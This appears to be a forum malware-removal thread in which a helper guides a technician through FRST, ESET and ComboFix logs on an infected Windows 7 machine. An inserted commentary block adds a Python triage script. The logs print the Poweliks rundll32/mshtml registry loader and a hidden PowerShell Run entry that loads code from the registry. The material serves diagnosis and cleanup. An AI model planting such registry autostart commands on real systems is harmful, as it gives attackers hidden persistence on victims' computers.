Solved That fake "Chrome" browser.exe infection

Yes, sorry. Been deployed at another site for a project this week, and haven't been able to coordinate with the user on this machine for the next step.
 
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 28-09-2014 02
Ran by bella at 2014-09-29 16:42:09 Run:1
Running from C:\Users\bella\Desktop
Loaded Profile: bella (Available profiles: bella & crystal & mor1 & Administrator & setup)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKU\S-1-5-21-336078627-3664855205-978596220-1153\...\Run: [wvxdmfokq] => rundll32.exe "C:\Users\bella\AppData\Local\CrashDumps\wvxdmfokq.dll",DllRegisterServer <===== ATTENTION
C:\Users\bella\AppData\Local\CrashDumps\wvxdmfokq.dll
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.153\npGoogleUpdate3.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll No File
S3 McAfee SiteAdvisor Service; c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe [X]
S3 catchme; \??\C:\Users\bella\AppData\Local\Temp\catchme.sys [X]
S4 LMIRfsClientNP; No ImagePath
S1 SASDIFSV; \??\C:\Users\bella\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV.SYS [X]
S1 SASKUTIL; \??\C:\Users\bella\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL.SYS [X]
C:\Users\bella\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmppmchf8.dll
C:\Users\bella\AppData\Local\Temp\Quarantine.exe
Task: {7842BDB0-3EF8-4C9D-AC97-ACFD9C3D24D9} - System32\Tasks\{EA7BDE4B-E79B-9AE7-C48B-6A7290BB8BDF} => C:\Windows\system32\bwjbt.dll/s "C:\Windows\system32\bwjbt.dll"
Task: {86F63824-521F-4B32-A196-C881D5D820F3} - System32\Tasks\{EEB24AC8-CECD-565F-1D17-BB284BABA67C} => C:\Windows\system32\vihsfy.dll/s "C:\Windows\system32\vihsfy.dll"
Task: {882EFFD9-D52E-4618-BA3E-A48DDA9DF907} - System32\Tasks\{7FD23C53-AA66-5637-7E1F-90D46F9A62AB} => C:\Windows\system32\lkzat.dll/s "C:\Windows\system32\lkzat.dll"
C:\Windows\system32\bwjbt.dll
C:\Windows\system32\vihsfy.dll
C:\Windows\system32\lkzat.dll
Task: {9400D8DC-981F-41FA-AB9B-6563A8803675} - System32\Tasks\{7FD45665-85EA-8066-EE79-5FA9A3F7CE2E} => C:\Windows\system32\nfxmxrz.dll/s "C:\Windows\system32\nfxmxrz.dll"
C:\Windows\system32\nfxmxrz.dll
Task: {E9626A09-0716-4133-9EF9-088C9EA46DA6} - System32\Tasks\{E064ED84-AD37-CF9C-9AF8-5214DAA12C73} => C:\Windows\system32\qywcwk.dll/s "C:\Windows\system32\qywcwk.dll"
Task: {F4DCB859-DA48-40EE-9001-B5AFDF2CC19B} - System32\Tasks\{2418D788-DCD6-326A-E4C6-FACCA1838469} => C:\Windows\system32\cxelqm.dll/s "C:\Windows\system32\cxelqm.dll"
C:\Windows\system32\qywcwk.dll
C:\Windows\system32\cxelqm.dll
*****************
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKLM => Group Policy Restriction on software restored successfully.
HKU\S-1-5-21-336078627-3664855205-978596220-1153\Software\Microsoft\Windows\CurrentVersion\Run\\wvxdmfokq => Value not found.
"C:\Users\bella\AppData\Local\CrashDumps\wvxdmfokq.dll" => File/Directory not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value deleted successfully.
"HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => Key not found.
C:\Program Files\Google\Update\1.3.21.153\npGoogleUpdate3.dll not found.
c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll not found.
McAfee SiteAdvisor Service => Service deleted successfully.
catchme => Service deleted successfully.
LMIRfsClientNP => Service deleted successfully.
SASDIFSV => Service deleted successfully.
SASKUTIL => Service deleted successfully.
"C:\Users\bella\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmppmchf8.dll" => File/Directory not found.
"C:\Users\bella\AppData\Local\Temp\Quarantine.exe" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7842BDB0-3EF8-4C9D-AC97-ACFD9C3D24D9}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7842BDB0-3EF8-4C9D-AC97-ACFD9C3D24D9}" => Key deleted successfully.
C:\Windows\System32\Tasks\{EA7BDE4B-E79B-9AE7-C48B-6A7290BB8BDF} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{EA7BDE4B-E79B-9AE7-C48B-6A7290BB8BDF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{86F63824-521F-4B32-A196-C881D5D820F3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86F63824-521F-4B32-A196-C881D5D820F3}" => Key deleted successfully.
C:\Windows\System32\Tasks\{EEB24AC8-CECD-565F-1D17-BB284BABA67C} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{EEB24AC8-CECD-565F-1D17-BB284BABA67C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{882EFFD9-D52E-4618-BA3E-A48DDA9DF907}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{882EFFD9-D52E-4618-BA3E-A48DDA9DF907}" => Key deleted successfully.
C:\Windows\System32\Tasks\{7FD23C53-AA66-5637-7E1F-90D46F9A62AB} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7FD23C53-AA66-5637-7E1F-90D46F9A62AB}" => Key deleted successfully.
"C:\Windows\system32\bwjbt.dll" => File/Directory not found.
"C:\Windows\system32\vihsfy.dll" => File/Directory not found.
"C:\Windows\system32\lkzat.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9400D8DC-981F-41FA-AB9B-6563A8803675}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9400D8DC-981F-41FA-AB9B-6563A8803675}" => Key deleted successfully.
C:\Windows\System32\Tasks\{7FD45665-85EA-8066-EE79-5FA9A3F7CE2E} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7FD45665-85EA-8066-EE79-5FA9A3F7CE2E}" => Key deleted successfully.
"C:\Windows\system32\nfxmxrz.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E9626A09-0716-4133-9EF9-088C9EA46DA6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9626A09-0716-4133-9EF9-088C9EA46DA6}" => Key deleted successfully.
C:\Windows\System32\Tasks\{E064ED84-AD37-CF9C-9AF8-5214DAA12C73} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E064ED84-AD37-CF9C-9AF8-5214DAA12C73}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F4DCB859-DA48-40EE-9001-B5AFDF2CC19B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4DCB859-DA48-40EE-9001-B5AFDF2CC19B}" => Key deleted successfully.
C:\Windows\System32\Tasks\{2418D788-DCD6-326A-E4C6-FACCA1838469} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2418D788-DCD6-326A-E4C6-FACCA1838469}" => Key deleted successfully.
"C:\Windows\system32\qywcwk.dll" => File/Directory not found.
"C:\Windows\system32\cxelqm.dll" => File/Directory not found.
==== End of Fixlog ====
 
How is the computer doing?

Last scans...

Download Security Check from here or here and save it to your Desktop.
  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE to access the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive the UNSUPPORTED OPERATING SYSTEM! ABORTED! message, restart the computer and Security Check should run.


Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center
    • Windows Update
    • Windows Defender
    • Other Services
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.

Download Temp File Cleaner (TFC)
Alternate download: http://www.itxassociates.com/OT-Tools/TFC.exe
  • Double click on TFC.exe to run the program.
  • Click on Start button to begin cleaning process.
  • TFC will close all running programs, and it may ask you to restart the computer.

Please run a free online scan with the ESET Online Scanner

  • Disable your antivirus program
  • Internet Explorer users - Click on this link to open ESET OnlineScan.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on ESET Smart Installer to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the esetsmartinstaller_enu icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Check "Enable detection of potentially unwanted applications".
  • Click Advanced settings and make sure all 4 boxes are checkmarked (two of them are already checkmarked by default).
    Do NOT checkmark "Use custom proxy settings".
  • Click the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats.
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
 
Ugh. User was out on Friday and shut down the machine, so I couldn't get to it over the weekend. Will have her leave it on tonight.

She did have strange errors cropping up, so something is still resident.
 
(Weird. I posted this 5 hours ago, but it didn't post. It did hold in the message buffer.)

Ha-haaaa~~~!

Not only were there more problems this morning, but the dllhost issue that started all this is back again. Can't tell if it was a reinfection in some fashion, or if the existing remnants were able to get back in place. But now I can't even get rid of THAT infection the way I did before, which I had to try to get the user at all workable for the day. (Combofix/rkill/TDSSkiller/AdwCleaner/et al)

Right now I'm keeping it at bay with a recurring "tskill dllhost" script, which will at least keep the infection from eating up all her RAM and CPU and basically taking it out. I'll have full access to it when she goes home for the day, apply your previous steps and anything else you may suggest before 4:30pm EST.

It seems like it's making an external call to draw in all the dllhost processes, as with the network cable unplugged I would see a single dllhost process running, but with it plugged back in, dozens would build up again. It would occur in Safe Mode with Networking, too. (Can everything you've suggested run in Safe Mode with Command Prompt normally? If I can, that may be the best way to attack this.)

*sigh*

Bozhe moi.
 
Results of screen317's Security Check version 0.99.88
Windows 7 Service Pack 1 x86 (UAC is disabled!)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
Windows Firewall Disabled!
WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
Adobe Reader XI
Google Chrome 37.0.2062.120
Google Chrome 37.0.2062.124
````````Process Check: objlist.exe by Laurent````````
Malwarebytes Anti-Malware mbamservice.exe
SAAZOD Malwarebytes' Anti-Malware mbamscheduler.exe
SAAZOD Malwarebytes' Anti-Malware mbam-msp.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C: 2%
````````````````````End of Log``````````````````````



-----------------------------------------------------------------------------------------------------------------------------------------

Farbar Service Scanner Version: 21-07-2014
Ran by bella (administrator) on 06-10-2014 at 16:36:40
Running from "C:\Users\bella\Desktop"
Microsoft Windows 7 Professional Service Pack 1 (X86)
Boot Mode: Normal
****************************************************************
Internet Services:
============
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.

Windows Firewall:
=============
Firewall Disabled Policy:
==================

System Restore:
============
System Restore Disabled Policy:
========================

Action Center:
============

Windows Update:
============
Windows Autoupdate Disabled Policy:
============================

Windows Defender:
==============
Other Services:
==============

File Check:
========
C:\Windows\system32\nsisvc.dll => File is digitally signed
C:\Windows\system32\Drivers\nsiproxy.sys => File is digitally signed
C:\Windows\system32\dhcpcore.dll => File is digitally signed
C:\Windows\system32\Drivers\afd.sys => File is digitally signed
C:\Windows\system32\Drivers\tdx.sys => File is digitally signed
C:\Windows\system32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\system32\dnsrslvr.dll => File is digitally signed
C:\Windows\system32\mpssvc.dll => File is digitally signed
C:\Windows\system32\bfe.dll => File is digitally signed
C:\Windows\system32\Drivers\mpsdrv.sys => File is digitally signed
C:\Windows\system32\SDRSVC.dll => File is digitally signed
C:\Windows\system32\vssvc.exe => File is digitally signed
C:\Windows\system32\wscsvc.dll => File is digitally signed
C:\Windows\system32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\system32\wuaueng.dll => File is digitally signed
C:\Windows\system32\qmgr.dll => File is digitally signed
C:\Windows\system32\es.dll => File is digitally signed
C:\Windows\system32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\system32\ipnathlp.dll => File is digitally signed
C:\Windows\system32\iphlpsvc.dll => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed

**** End of log ****

-----------------------------------------------------------------------------------------------------------------------------------------

C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\precache.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\SaUpdate.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\UpdateTask.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\Program Files\Ask.com\Updater\Updater.exe.vir a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\AdwCleaner\Quarantine\C\ProgramData\Ask\APN-Stub\AD5\APNIC.dll.vir a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application deleted - quarantined
C:\TDSSKiller_Quarantine\26.08.2014_14.21.16\rtkt0000\svc0000\tsk0000.dta Win32/Patched.IB trojan cleaned - quarantined
C:\TDSSKiller_Quarantine\26.08.2014_14.30.30\rtkt0000\svc0000\tsk0000.dta Win32/Patched.IB trojan cleaned - quarantined
C:\TDSSKiller_Quarantine\26.08.2014_14.30.30\rtkt0001\svc0000\tsk0000.dta Win32/Patched.IB trojan cleaned - quarantined
C:\Users\bella\AppData\Local\BrowserWireless\BrowserWireless.dll a variant of Win32/Kryptik.CKGI trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Local\Microsoft\wvxdmfokq.dll Win32/TrojanDownloader.Tracur.AM trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\Macromedia\jttxbtp.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\fplbpzn.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\ftbp.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\ftrd.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\jptpv.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\lrjjnj.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\ltnvr.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\pznlf.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\tnrdb.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\vfhzvbf.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\vjbd.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\xdddfv.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zffndjnx.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zrrxrjtd.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zxppzvxp.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\AppData\Roaming\SUPERAntiSpyware.com\zxptj.dll Win32/TrojanDownloader.Tracur.AL trojan cleaned by deleting - quarantined
C:\Users\bella\Downloads\Avery Wizard 4.01 - US 20111209.exe a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application deleted - quarantined
C:\Windows\Installer\7c1f006.msi a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted - quarantined
C:\Windows\Installer\{57EA7009-3830-42B0-A0A6-4783233E8875}\msiexec.exe a variant of Win32/Injector.BMRI trojan cleaned by deleting - quarantined
C:\Windows\Installer\{75B25EA4-EFA1-4FBB-B244-878C3D339197}\msiexec.exe a variant of Generik.MSGWPCY trojan cleaned by deleting - quarantined
C:\Windows\Installer\{BD235F53-DB1F-4511-9810-8099A623C716}\msiexec.exe a variant of Win32/Kryptik.CMJT trojan cleaned by deleting - quarantined
C:\Windows\Installer\{D018F48B-0A82-454E-9D1F-110DD8DDBCEC}\msiexec.exe a variant of Generik.MSGWPCY trojan cleaned by deleting - quarantined
C:\Windows\System32\vsjnrsv.dll a variant of MSIL/Injector.FQD trojan cleaned by deleting - quarantined
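Two things in this thread live only in the registry and explain why file scanners kept coming up empty: the Poweliks CLSID entry that ComboFix reports in the next post (a LocalServer32 value that starts rundll32.exe with a javascript: URL, loads mshtml, and eval()s a string stored with every character shifted up by one), and the "ocx" Run entry that has PowerShell load a .NET assembly straight out of registry data. The FRST fixlog at the top of the thread adds a third registry-only trick: "Group Policy restriction on software" entries, which are Software Restriction Policy path rules pointed at the Malwarebytes and McAfee directories. The script below is an added example, not code from any post or from FRST, ComboFix or ESET. It undoes the character shift on the encoded string exactly as pasted in the ComboFix log, pulls out the registry value the decoded loader reads with RegRead, and then scans a .reg export for the three patterns. The export it scans is constructed for the example: the two HKCU keys mirror the values quoted in the ComboFix log (the "ocx" command is cut short there, so it is cut short here too; the "a" stage-2 value is a placeholder because the thread never shows it), the SRP rule GUID is made up, and IAStorIcon is a benign entry copied from the HKLM Run list as a negative control. One caveat a reader should know before trusting the decoded path: the pasted string is three characters short in the last CLSID group (it decodes to a8f5907d5 where the CLSID line reads A8F59079A8D5), so the decode is reported exactly as the forum text yields it rather than corrected.

```python
"""Offline triage for the registry-resident autostarts seen in this thread.

Added example; not part of any post above and not code from FRST, ComboFix
or ESET. It works on a text export of the registry (for instance the output
of `reg export HKCU\\Software\\Classes\\CLSID hkcu-clsid.reg`), so it can be
run on a copy pulled from the machine rather than against the live hive.
"""
import re

# The LocalServer32 value ComboFix printed for CLSID
# {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}, copied verbatim from the thread.
# The dropper stored every character one code point above the real script
# and undoes that at run time with
#   .replace(/./g, function(_){return String.fromCharCode(_.charCodeAt()-1);})
# NOTE: as pasted, the last CLSID group is three characters short.
ENCODED = ("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)"
           "(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5."
           "1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*")


def decode_shift(text, shift=1):
    """Undo the per-character shift: chr(ord(c) - shift) for every character."""
    return "".join(chr(ord(c) - shift) for c in text)


def regread_target(script):
    """Return the registry value the decoded loader reads with RegRead().
    The path sits inside a JScript string literal, so a doubled backslash
    there is a single backslash in the real path."""
    m = re.search(r"RegRead\('([^']+)'\)", script)
    return m.group(1).replace("\\\\", "\\") if m else None


# Indicators taken from the two autostart values quoted in this thread
# (the Poweliks LocalServer32 and the "ocx" PowerShell Run entry).
INDICATORS = [
    (re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I),
     "rundll32 launched with a javascript: URL"),
    (re.compile(r"mshtml,RunHTMLApplication", re.I),
     "mshtml RunHTMLApplication used as script host"),
    (re.compile(r"\[Reflection\.Assembly\]::Load\(", re.I),
     "PowerShell loads a .NET assembly from registry data"),
    (re.compile(r"-windowstyle\s+hidden", re.I),
     "hidden PowerShell window"),
]
# FRST's "HKLM Group Policy restriction on software" lines come from Software
# Restriction Policy path rules. Level 0 under CodeIdentifiers is "Disallowed",
# which is how the infection blocked the Malwarebytes and McAfee directories.
SRP_DISALLOWED = re.compile(r"\\Safer\\CodeIdentifiers\\0\\Paths\\", re.I)

_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s):
    # .reg string syntax: \\ is a backslash and \" is a double quote
    return re.sub(r"\\(.)", r"\1", s)


def scan_reg_export(text):
    """Return [(key, value_name, [reasons])] for every REG_SZ value in a .reg
    export that trips an indicator. dword:/hex: data is skipped, and so are
    multi-line hex continuations, since only string values are examined."""
    findings = []
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _VALUE_LINE.match(line)
        if not m or key is None:
            continue
        name = "(Default)" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        data = m.group(2)
        if not (len(data) >= 2 and data.startswith('"') and data.endswith('"')):
            continue  # not a string value
        data = _unescape(data[1:-1])
        reasons = [why for rx, why in INDICATORS if rx.search(data)]
        if name.lower() == "itemdata" and SRP_DISALLOWED.search(key):
            reasons.append(f"SRP 'Disallowed' path rule for {data}")
        if reasons:
            findings.append((key, name, reasons))
    return findings


# Constructed sample export (see the lead-in for what is copied and what is
# made up: the rule GUID and the "a" placeholder are not from the thread).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32]
@="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval(\"...\")"
"a"="<jscript.encode stage 2, not shown in the thread>"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"="\"C:\\Program Files\\Intel\\Intel(R) Rapid Storage Technology\\IAStorIcon.exe\""
"ocx"="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden [Reflection.Assembly]::Load((gp -Path 'hkcu:software\\classes\\clsid').OCX).GetType('gm.ks').GetMethod('m').Invoke(0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{11111111-2222-3333-4444-555555555555}]
"ItemData"="C:\\Program Files\\McAfee"
"SaferFlags"=dword:00000000
'''

if __name__ == "__main__":
    loader = decode_shift(ENCODED)
    print("decoded loader :", loader)
    print("stage-2 value  :", regread_target(loader))
    for key, name, reasons in scan_reg_export(SAMPLE_EXPORT):
        print(f"[{key}] {name!r}: {'; '.join(reasons)}")
```

The decoded loader is a document.write() of a `<script language=jscript.encode>` block whose body is read from the `a` value under the same CLSID key, which is why deleting the CLSID (as ComboFix did) rather than hunting for a file is the right fix, and why the scanner above looks at value data rather than paths. Against a real export, run it over `reg export HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer` and the HKCU CLSID and Run keys; anything it flags should be cross-checked against the live key before deletion, since a legitimate REG_EXPAND_SZ ItemData shows up as hex(2): in an export and is deliberately not parsed here.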
 
Some additional results of things I had to run earlier today, to try to keep the machine manageable: (With some garbage ComboFix text removed.)

ComboFix 14-10-04.01 - bella 10/06/2014 10:20:20.4.4 - x86 NETWORK
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.3493.2573 [GMT -4:00]
Running from: c:\users\bella\Downloads\ComboFix.exe
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\lmhosts
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
<NO NAME> REG_SZ Thumbnail Cache Class Factory for Out of Proc Server
AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
<NO NAME> REG_EXPAND_SZ %SYSTEMROOT%\system32\thumbcache.dll
ThreadingModel REG_SZ Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
<NO NAME> REG_SZ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))

.
((((((((((((((((((((((((( Files Created from 2014-09-06 to 2014-10-06 )))))))))))))))))))))))))))))))
.
.
2014-10-06 14:51 . 2014-10-06 14:51 -------- d-----w- c:\users\Public\AppData\Local\temp
2014-10-06 14:51 . 2014-10-06 14:51 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-10-06 14:51 . 2014-10-06 14:51 -------- d-----w- c:\users\bella\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\setup\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\mor1\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\crystal\AppData\Local\temp
2014-10-06 14:50 . 2014-10-06 14:50 -------- d-----w- c:\users\administrator\AppData\Local\temp
2014-10-03 06:55 . 2014-10-03 06:55 62576 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{1FAD817A-F54A-433E-8181-6DBD3EED6056}\offreg.dll
2014-10-03 06:54 . 2014-09-09 01:24 8806800 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{1FAD817A-F54A-433E-8181-6DBD3EED6056}\mpengine.dll
2014-09-24 23:11 . 2014-09-24 23:11 48640 ----a-w- c:\windows\system32\vsjnrsv.dll
2014-09-17 22:00 . 2014-10-05 22:05 40776 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-09-17 12:07 . 2014-10-03 01:20 -------- d-sh--w- c:\users\bella\AppData\Local\EmieUserList
2014-09-17 12:07 . 2014-09-17 12:07 -------- d-sh--w- c:\users\bella\AppData\Local\EmieSiteList
2014-09-17 07:32 . 2014-08-18 21:30 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-17 07:31 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-17 07:25 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-17 07:25 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
